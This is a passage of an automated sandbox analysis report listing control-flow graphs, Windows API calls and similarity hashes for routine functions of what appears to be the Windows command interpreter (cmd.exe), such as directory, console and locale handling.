                                                                      control_flow_graph 441 48bc7-48be4 call 57d90 444 5b5d4-5b5d8 441->444 445 48bea-48c16 call 55a2e call 4e3f0 441->445 444->445 447 5b5de-5b5e3 444->447 452 5b774-5b77a call 561e6 445->452 453 48c1c-48c2d call 4acb0 445->453 449 48e67-48e76 447->449 456 5b77f 452->456 453->452 459 48c33-48c3a 453->459 458 5b781 456->458 460 48c3d-48c46 459->460 460->460 461 48c48-48c4c 460->461 462 48c4f-48c59 461->462 463 48c66-48c70 462->463 464 48c5b-48c60 462->464 466 48c76-48c85 GetCurrentDirectoryW 463->466 467 5b5f0 463->467 464->463 465 5b5e8-5b5eb 464->465 465->462 468 5b5fb 466->468 469 48c8b-48cb0 towupper iswalpha 466->469 467->468 471 5b606 468->471 470 48cb6-48cba 469->470 469->471 470->471 472 48cc0-48cde towupper 470->472 474 5b60f 471->474 473 48ce4-48cf8 GetFullPathNameW 472->473 472->474 475 48cfe-48d01 473->475 476 5b61a-5b622 GetLastError 473->476 474->476 478 48d07-48d0e 475->478 479 5b64c-5b66a call 561e6 _local_unwind4 475->479 477 5b627-5b647 call 561e6 _local_unwind4 476->477 482 48d14-48d19 478->482 483 5b674 478->483 479->483 486 5b747-5b767 call 561e6 _local_unwind4 482->486 487 48d1f-48d23 482->487 489 5b67f 483->489 486->458 487->489 490 48d29-48d2d 487->490 494 5b68a 489->494 490->486 492 48d33-48d37 490->492 493 48d3d 492->493 492->494 495 48d40-48d4a 493->495 497 5b695 494->497 495->495 496 48d4c-48d52 495->496 496->497 498 48d58 496->498 500 5b6a0 497->500 499 48d5b-48d73 call 57d82 498->499 504 48d75-48d7c 499->504 505 48d82-48d8c 499->505 503 5b6ab-5b6b6 GetLastError 500->503 506 48da2-48da9 503->506 507 5b6bc-5b6bf 503->507 504->505 508 48e77-48e7a 504->508 505->500 509 48d92-48d9c GetFileAttributesW 505->509 511 48dc9-48dd2 506->511 512 48dab-48db0 506->512 507->506 510 5b6c5-5b6c8 507->510 508->499 509->503 509->506 510->477 513 5b6ce 510->513 516 48dd4-48dd9 511->516 517 48dfa-48dfc 511->517 514 48db6-48dbc call 50207 512->514 515 5b6d3 512->515 513->506 527 48dc1-48dc3 514->527 521 5b6de 515->521 516->521 522 48ddf-48de9 GetFileAttributesW 516->522 518 48dfe-48e01 517->518 519 48e09-48e0e 517->519 523 48e03-48e07 518->523 524 48e1f-48e24 518->524 525 48e87-48e8d 519->525 526 48e10-48e19 SetCurrentDirectoryW 519->526 529 5b6e9-5b6f4 GetLastError 521->529 528 48def-48df4 522->528 522->529 523->519 523->524 530 48e26-48e30 call 4a976 524->530 531 48e8f-48e95 524->531 525->526 526->476 526->524 527->479 527->511 528->517 533 5b6ff-5b722 call 561e6 _local_unwind4 528->533 529->477 532 5b6fa 529->532 539 5b727-5b745 call 561e6 _local_unwind4 530->539 540 48e36-48e3e 530->540 531->530 532->477 533->449 539->456 542 48e97-48e9c 540->542 543 48e40-48e65 call 48e9e call 48e7f call 561e6 540->543 542->543 543->449
                                                                      APIs
                                                                        • Part of subcall function 00055A2E: memset.MSVCRT ref: 00055A5A
                                                                        • Part of subcall function 0004E3F0: memset.MSVCRT ref: 0004E455
                                                                      • GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,-00000105,0006C9B0,00000240,00051E92,00000000,00000000,0005ACE0,00000000,00000000,?,00000104,?), ref: 00048C7A
                                                                      • towupper.MSVCRT ref: 00048C8F
                                                                      • iswalpha.MSVCRT ref: 00048CA4
                                                                      • towupper.MSVCRT ref: 00048CC4
                                                                      • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?), ref: 00048CF0
                                                                      • GetFileAttributesW.KERNELBASE(?), ref: 00048D93
                                                                      • GetFileAttributesW.KERNELBASE(?), ref: 00048DE0
                                                                      • SetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?), ref: 00048E11
                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 0005B6AB
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: AttributesCurrentDirectoryFilememsettowupper$ErrorFullLastNamePathiswalpha
                                                                      • String ID:
                                                                      • API String ID: 1133067188-0
                                                                      • Opcode ID: 82678135e27e01e62064306c90a059d5488255715e112bc4de63ae0a161e4d02
                                                                      • Instruction ID: f571c1936898bc5b465c7df6d058f5cde920699d2f24acd9d208213fd42c36a8
                                                                      • Opcode Fuzzy Hash: 82678135e27e01e62064306c90a059d5488255715e112bc4de63ae0a161e4d02
                                                                      • Instruction Fuzzy Hash: B2B1E270E042159ADB68EF25DC45BFEB3B4EF14301F548579E81AE3190EB34AE88CB55
                                                                      Function 0004E310 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 78COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 551 4e310-4e341 _get_osfhandle SetConsoleMode _get_osfhandle GetConsoleMode 552 4e357-4e370 _get_osfhandle GetConsoleMode 551->552 553 4e343-4e355 551->553 555 4e372-4e37f 552->555 556 4e3bb 552->556 553->552 554 4e3bc-4e3d9 _get_osfhandle SetConsoleMode 553->554 554->552 559 4e3df-5dc17 554->559 557 4e3a0-4e3a9 555->557 558 4e381-4e39a _get_osfhandle SetConsoleMode 555->558 560 4e3ba 557->560 561 4e3ab-4e3b8 557->561 558->557 559->552 563 5dc1d-5dc45 _get_osfhandle SetConsoleMode 559->563 560->556 561->560 563->552
                                                                      APIs
                                                                      • _get_osfhandle.MSVCRT ref: 0004E318
                                                                      • SetConsoleMode.KERNELBASE(00000000), ref: 0004E322
                                                                      • _get_osfhandle.MSVCRT ref: 0004E32F
                                                                      • GetConsoleMode.KERNELBASE(00000000), ref: 0004E339
                                                                      • _get_osfhandle.MSVCRT ref: 0004E35E
                                                                      • GetConsoleMode.KERNELBASE(00000000), ref: 0004E368
                                                                      • _get_osfhandle.MSVCRT ref: 0004E390
                                                                      • SetConsoleMode.KERNELBASE(00000000), ref: 0004E39A
                                                                      • _get_osfhandle.MSVCRT ref: 0004E3C7
                                                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 0004E3D1
                                                                      • _get_osfhandle.MSVCRT ref: 0005DC35
                                                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 0005DC3F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: ConsoleMode_get_osfhandle
                                                                      • String ID: CMD.EXE
                                                                      • API String ID: 1606018815-3025314500
                                                                      • Opcode ID: 55c65b58c072293ce1d6a1731ca2debfe5263719f928fc51c46e3a9cb9b014d8
                                                                      • Instruction ID: 83d3cebcf76e9257be1d4f0d47c4bffce88d9b7f25280bea3da57f7ebe971a10
                                                                      • Opcode Fuzzy Hash: 55c65b58c072293ce1d6a1731ca2debfe5263719f928fc51c46e3a9cb9b014d8
                                                                      • Instruction Fuzzy Hash: 41218EF0B00600AFFB145F34EC1EB1A3A64BB41716B04853AF64AD72A1DABDD9548F5A
                                                                      Function 000459C0 Relevance: 15.3, APIs: 10, Instructions: 270COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 565 459c0-459e2 566 459f4-45a36 memset call 4e3f0 565->566 567 459e4-459ee call 50b12 565->567 572 45a3c-45a41 566->572 573 59a3a-59a3d 566->573 567->566 574 59a27-59a35 call 478e4 567->574 575 45a47-45a5b GetFullPathNameW 572->575 576 59a3f 572->576 578 59a50 573->578 585 45a90-45a9e call 56b30 574->585 579 45a61-45a66 575->579 580 59a4a GetLastError 575->580 576->580 582 59a52-59a53 578->582 583 59a60-59a6f call 478e4 579->583 584 45a6c-45a78 CreateDirectoryW 579->584 580->578 586 59a54-59a5a call 478e4 582->586 596 59a76-59a82 call 478e4 583->596 588 45aa1-45aac GetLastError 584->588 589 45a7a-45a84 584->589 586->583 588->596 597 45ab2-45ab5 588->597 593 45a86-45a8d ??_V@YAXPAX@Z 589->593 594 45a8e 589->594 593->594 594->585 605 59a8a 596->605 597->582 600 45abb-45ac2 597->600 602 45ac8-45acf 600->602 603 45b8b-45b8e 600->603 604 45ad5-45adf 602->604 602->605 603->586 606 45ae5-45ae9 604->606 607 59aa0-59aa4 604->607 608 59a95 605->608 606->608 609 45aef-45af2 606->609 610 59aa6 607->610 611 59aac-59aaf 607->611 608->607 612 45b35 609->612 610->611 611->603 613 59ab5-59ab9 611->613 614 45b3b-45b41 612->614 615 59ac1-59ac5 613->615 616 59abb 613->616 618 45b43-45b49 614->618 619 45b68-45b6a 614->619 615->603 617 59acb-59acf 615->617 616->615 620 59ad7-59ae8 617->620 621 59ad1 617->621 622 45af4-45af6 618->622 623 45b4b-45b5c 618->623 624 45b83-45b89 619->624 625 45b6c-45b78 CreateDirectoryW 619->625 627 59b17-59b1a 620->627 628 59aea-59af0 620->628 621->620 626 45af7-45b01 622->626 623->618 629 45b5e-45b64 623->629 624->625 625->589 630 45b7e 625->630 632 45b07-45b11 CreateDirectoryW 626->632 633 59b71 626->633 635 59b27-59b2d 627->635 636 59b1c-59b25 627->636 634 59af1-59af6 628->634 629->614 637 45b66 629->637 631 59b7c-59b87 GetLastError 630->631 631->589 638 59b8d 631->638 639 45b20-45b32 632->639 640 45b13-45b1e GetLastError 632->640 633->631 641 59b0f-59b15 634->641 642 59af8-59b0d 634->642 635->619 643 59b33-59b37 635->643 636->635 637->626 638->582 639->612 640->603 640->639 641->627 642->634 642->641 644 59b38-59b3d 643->644 645 59b56-59b61 644->645 646 59b3f-59b54 644->646 645->619 647 59b67-59b6a 645->647 646->644 646->645 647->633
                                                                      APIs
                                                                      • memset.MSVCRT ref: 00045A10
                                                                      • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,-00000001), ref: 00045A53
                                                                      • CreateDirectoryW.KERNELBASE(?,00000000), ref: 00045A70
                                                                      • ??_V@YAXPAX@Z.MSVCRT(?), ref: 00045A87
                                                                        • Part of subcall function 00050B12: GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00050B40
                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00045AA1
                                                                      • CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000), ref: 00045B09
                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00045B13
                                                                      • CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000), ref: 00045B70
                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00059B7C
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: CreateDirectoryErrorLast$DriveFullNamePathTypememset
                                                                      • String ID:
                                                                      • API String ID: 402963468-0
                                                                      • Opcode ID: 47767e07b2e2caada81835e552cfc6f663addd214d29c5233d6266041db9f373
                                                                      • Instruction ID: 5003bc889e565ff77d020214a0fed27bca67fcd1717e3ef4b07fc4421f623393
                                                                      • Opcode Fuzzy Hash: 47767e07b2e2caada81835e552cfc6f663addd214d29c5233d6266041db9f373
                                                                      • Instruction Fuzzy Hash: 2D91E271A00606DBEB34DB659C85ABBB7F4FF89312F1440B9E809E7181E7748D84CBA5
                                                                      Function 00056903 Relevance: 10.6, APIs: 7, Instructions: 105sleepCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 648 56903-5691d call 571a8 651 5691f-5692e 648->651 652 56930-56932 651->652 653 56948-5694a 651->653 655 56934-56939 652->655 656 5693b-56946 Sleep 652->656 654 5694b-56951 653->654 657 56953-5695b _amsg_exit 654->657 658 5695d-56963 654->658 655->654 656->651 659 56997-5699d 657->659 660 56965-5697e call 56a7c 658->660 661 56991 658->661 663 5699f-569b0 _initterm 659->663 664 569ba-569bc 659->664 660->659 668 56980-5698c 660->668 661->659 663->664 666 569c7-569ce 664->666 667 569be-569c5 664->667 669 569d0-569dd call 57000 666->669 670 569f3-56a05 call 509b1 666->670 667->666 672 56a6c-56a7b 668->672 669->670 676 569df-569f1 669->676 674 56a0a-56a19 670->674 677 56a51-56a58 674->677 678 56a1b-56a35 exit _XcptFilter 674->678 676->670 679 56a65 677->679 680 56a5a-56a60 _cexit 677->680 679->672 680->679
                                                                      APIs
                                                                      • Sleep.API-MS-WIN-CORE-SYNCH-L1-2-0(000003E8,0006CA98,0000000C), ref: 00056940
                                                                      • _amsg_exit.MSVCRT ref: 00056955
                                                                      • _initterm.MSVCRT ref: 000569A9
                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 000569D5
                                                                      • exit.MSVCRT ref: 00056A1C
                                                                      • _XcptFilter.MSVCRT ref: 00056A2E
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentFilterImageNonwritableSleepXcpt_amsg_exit_inittermexit
                                                                      • String ID:
                                                                      • API String ID: 796493780-0
                                                                      • Opcode ID: 6f53f1fcd138838371350baaecc71a5a68e443c6e0051280edc22a5f6d17ab7f
                                                                      • Instruction ID: 2423a6c584e1f020e7a00889e9807541085ccd9f20f3b49148da3d947cc86724
                                                                      • Opcode Fuzzy Hash: 6f53f1fcd138838371350baaecc71a5a68e443c6e0051280edc22a5f6d17ab7f
                                                                      • Instruction Fuzzy Hash: AF315579A44751CFFB218B54EC4572A37E5FB05736F600039EA029B2E1EBBA5944CB42
                                                                      Function 0004E2AF Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 34threadlibraryloaderCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 682 4e2af-4e2ba 683 4e2bc-4e2c9 SetThreadUILanguage 682->683 684 4e2ca-4e2d2 682->684 685 4e2d4-4e2ed GetModuleHandleW 684->685 686 4e2ef-4e2f1 684->686 685->686 688 4e307-4e309 685->688 686->688 689 4e2f3-4e301 GetProcAddress 686->689 688->683 690 4e30b-5dc0f SetThreadLocale 688->690 689->688
                                                                      APIs
                                                                      • SetThreadUILanguage.KERNELBASE ref: 0004E2C6
                                                                      • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(KERNEL32.DLL,00000000,0004B952), ref: 0004E2D9
                                                                      • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(75550000,SetThreadUILanguage,00000000,0004B952), ref: 0004E2F9
                                                                      • SetThreadLocale.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000409,00000000,0004B952), ref: 0005DC08
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: Thread$AddressHandleLanguageLocaleModuleProc
                                                                      • String ID: KERNEL32.DLL$SetThreadUILanguage
                                                                      • API String ID: 1264603166-2530943252
                                                                      • Opcode ID: 075d327640b9abc057148a12d14c76ead7db1d6497d1749669ec694595369031
                                                                      • Instruction ID: 89b307d68ab39e482db4c81d4d29312f852b0667d8c25b9b3e5deb4a389090c7
                                                                      • Opcode Fuzzy Hash: 075d327640b9abc057148a12d14c76ead7db1d6497d1749669ec694595369031
                                                                      • Instruction Fuzzy Hash: B1F0B4B1A046609BFA605B34FE0C6593794FB05B72B150362F916E32E4C7BC9C81CBA9
                                                                      Function 0004AD60 Relevance: 9.3, APIs: 6, Instructions: 328COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 692 4ad60-4adc0 GetConsoleTitleW 693 4adc6-4add8 call 55a2e 692->693 694 5cc60 692->694 699 5cc3f 693->699 700 4adde-4adf1 call 4e3f0 693->700 696 5cc6a-5cc73 GetLastError 694->696 698 5cc4d call 478e4 696->698 705 5cc52 698->705 704 5cc49-5cc4b 699->704 706 5cc55-5cc5b call 561e6 700->706 707 4adf7-4adff 700->707 704->698 705->706 706->694 708 4ae05-4ae1d call 4e950 707->708 709 4b0b9-4b0c3 call 50b12 707->709 715 4ae23-4ae26 708->715 716 4b118-4b11f call 521ee 708->716 709->704 717 4b0c9-4b0d6 call 47f47 709->717 715->706 719 4ae2c-4ae3e 715->719 732 4b126-4b12b call 52940 716->732 717->696 728 4b0dc-4b0f9 towupper 717->728 722 4ae44-4ae4c 719->722 723 5cc7c-5cc87 call 561e6 719->723 726 4ae52-4ae62 722->726 727 5cc8e 722->727 723->727 729 5cc99 726->729 730 4ae68-4ae76 726->730 727->729 731 4b100-4b109 728->731 734 5cca4 729->734 730->734 735 4ae7c-4ae8b call 4bc30 730->735 731->731 736 4b10b-4b112 731->736 743 4afc9-4b005 call 4b17b call 561e6 call 56b30 732->743 744 5ccaf 734->744 745 4b006-4b008 735->745 746 4ae91-4ae94 735->746 736->716 739 5cc75-5cc77 call 69a7d 736->739 739->723 748 5ccb7-5ccb9 744->748 745->746 749 4b00e-4b021 wcsncmp 745->749 750 4ae96-4aea3 call 4a800 746->750 751 4aea9-4aeab 746->751 753 4af2d-4af36 748->753 754 5ccbf-5ccc4 748->754 749->751 755 4b027 749->755 750->706 750->751 757 4af71-4af7a call 4b1b0 751->757 758 4aeb1-4aeb5 751->758 760 4b130-4b135 753->760 761 4af3c-4af3e 753->761 754->753 755->746 777 4af83-4af97 757->777 778 4af7c-4af7e call 4ad26 757->778 763 4af6b 758->763 764 4aebb-4aebd 758->764 760->761 769 4b13b-4b145 call 50b12 760->769 767 4af44-4af49 761->767 768 4b16c-4b170 761->768 763->757 770 4aec0-4aec9 764->770 774 4af50-4af59 767->774 768->767 773 4b176-5ccd6 768->773 793 4b147-4b14e 769->793 794 4b198-4b19c 769->794 770->770 776 4aecb-4aedd wcschr 770->776 790 5ccdb-5ccea call 478e4 773->790 774->774 783 4af5b-4af65 774->783 785 4b033-4b043 776->785 786 4aee3-4aee8 776->786 780 4afc4 call 4aa50 777->780 781 4af99-4af9f 777->781 778->777 780->743 788 4afa5-4afab 781->788 789 4b02c-4b031 call 4c6c0 781->789 783->758 783->763 791 4b046-4b04f 785->791 786->748 795 4aeee-4aef4 786->795 796 4afb1-4afb7 788->796 797 4b098-4b09d call 49dc0 788->797 789->743 790->705 791->791 800 4b051-4b05b 791->800 801 4b160-4b167 793->801 802 4b150-4b15a call 47f47 793->802 794->790 795->748 803 4aefa-4af03 795->803 806 4b0a2-4b0a8 796->806 807 4afbd-4afc2 call 49770 796->807 797->743 810 4b077-4b07f 800->810 811 4b05d 800->811 801->761 802->801 822 5ccc9-5ccd2 GetLastError 802->822 804 4af05-4af0a 803->804 814 4af20-4af22 804->814 815 4af0c-4af13 804->815 806->732 817 4b0aa-4b0b2 call 459a0 806->817 807->743 820 4b085-4b08e 810->820 821 4b193 call 56c78 810->821 819 4b060-4b067 811->819 814->744 824 4af28-4af2a 814->824 815->814 823 4af15-4af1e 815->823 830 4b0b4 817->830 827 4b072-4b075 819->827 828 4b069-4b071 819->828 820->797 821->794 822->790 823->804 823->814 824->753 827->810 827->819 828->827 830->743
                                                                      APIs
                                                                      • GetConsoleTitleW.KERNELBASE(?,00000104,73B29366,00000001,?), ref: 0004ADB6
                                                                        • Part of subcall function 00055A2E: memset.MSVCRT ref: 00055A5A
                                                                        • Part of subcall function 0004E3F0: memset.MSVCRT ref: 0004E455
                                                                      • towupper.MSVCRT ref: 0004B0E3
                                                                        • Part of subcall function 0004E950: memset.MSVCRT ref: 0004E9A0
                                                                        • Part of subcall function 0004E950: wcschr.MSVCRT ref: 0004E9FC
                                                                        • Part of subcall function 0004E950: wcschr.MSVCRT ref: 0004EA14
                                                                        • Part of subcall function 0004E950: _wcsicmp.MSVCRT ref: 0004EA80
                                                                      • wcschr.MSVCRT ref: 0004AED2
                                                                      • wcsncmp.MSVCRT ref: 0004B016
                                                                        • Part of subcall function 0004BC30: wcschr.MSVCRT ref: 0004BCA7
                                                                        • Part of subcall function 0004BC30: iswspace.MSVCRT ref: 0004BD1D
                                                                        • Part of subcall function 0004BC30: wcschr.MSVCRT ref: 0004BD39
                                                                        • Part of subcall function 0004BC30: wcschr.MSVCRT ref: 0004BD5D
                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00007FE7), ref: 0005CC6C
                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 0005CCCB
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: wcschr$memset$ErrorLast$ConsoleTitle_wcsicmpiswspacetowupperwcsncmp
                                                                      • String ID:
                                                                      • API String ID: 4198873954-0
                                                                      • Opcode ID: 5b54ca96aea324e5a32555bc2e1ffb24ebcec0eeb355625317f17bed760a950d
                                                                      • Instruction ID: 622315a6fe6faaa43a367606ebd5b9d5dfc955d1ce74144d1b38f53d1a7a383b
                                                                      • Opcode Fuzzy Hash: 5b54ca96aea324e5a32555bc2e1ffb24ebcec0eeb355625317f17bed760a950d
                                                                      • Instruction Fuzzy Hash: 16B149F1B002158BDB74AB68CC957BF73A0EF01301F144079DD1A97691EB349D89C79A
                                                                      Function 00051F1A Relevance: 7.6, APIs: 5, Instructions: 52threadCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 861 51f1a-51f33 GetConsoleOutputCP GetCPInfo 862 5f185-5f194 GetThreadLocale 861->862 863 51f39-51f54 memset 861->863 866 5f196-5f1a0 862->866 867 5f1ae-5f1b2 862->867 864 5f1d7-5f1d8 863->864 865 51f5a 863->865 870 5f1dd-5f1e2 864->870 866->867 868 5f1b4-5f1b8 867->868 869 5f1c8 867->869 868->869 871 5f1ba 868->871 869->864 872 5f1e4-5f1ec 870->872 873 5f20b-5f20c 870->873 871->869 874 5f203-5f209 872->874 875 5f1ee-5f200 memset 872->875 874->870 874->873 875->874
                                                                      APIs
                                                                      • GetConsoleOutputCP.KERNELBASE(00050A41), ref: 00051F1A
                                                                      • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0007C9F0), ref: 00051F2B
                                                                      • memset.MSVCRT ref: 00051F45
                                                                      • GetThreadLocale.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 0005F185
                                                                      • memset.MSVCRT ref: 0005F1FB
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: memset$ConsoleInfoLocaleOutputThread
                                                                      • String ID:
                                                                      • API String ID: 1263632223-0
                                                                      • Opcode ID: 08413fa8627f8965f786c2217c5b5fc106c2042e0c39290696c0df0fd3caa87a
                                                                      • Instruction ID: f1991439594509abce895dc7cc0a6ffb12e50ed598eee4bb0fb38f4cfacb0be0
                                                                      • Opcode Fuzzy Hash: 08413fa8627f8965f786c2217c5b5fc106c2042e0c39290696c0df0fd3caa87a
                                                                      • Instruction Fuzzy Hash: 841106B1D182139AFBB05B14EC0EBB72B94A700302F48413EEED9A5195DB6C4489475E
                                                                      Function 0004E3F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 883 4e3f0-4e403 884 4e405-4e41d call 56e25 883->884 885 4e45d 883->885 888 4e422-4e427 884->888 887 4e45f-4e463 885->887 889 4e42d-4e43b 888->889 890 5dc4a-5dc66 call 634d4 888->890 892 4e441-4e44f 889->892 893 5dc6b-5dc72 ??_V@YAXPAX@Z 889->893 890->887 895 4e466-4e468 892->895 896 4e451-4e45a memset 892->896 895->896 896->885
                                                                      APIs
                                                                      • memset.MSVCRT ref: 0004E455
                                                                      • ??_V@YAXPAX@Z.MSVCRT(?,00045F21,-00000001), ref: 0005DC6C
                                                                      Strings
                                                                      • onecore\base\cmd\maxpathawarestring.cpp, xrefs: 0005DC57
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: memset
                                                                      • String ID: onecore\base\cmd\maxpathawarestring.cpp
                                                                      • API String ID: 2221118986-3416068913
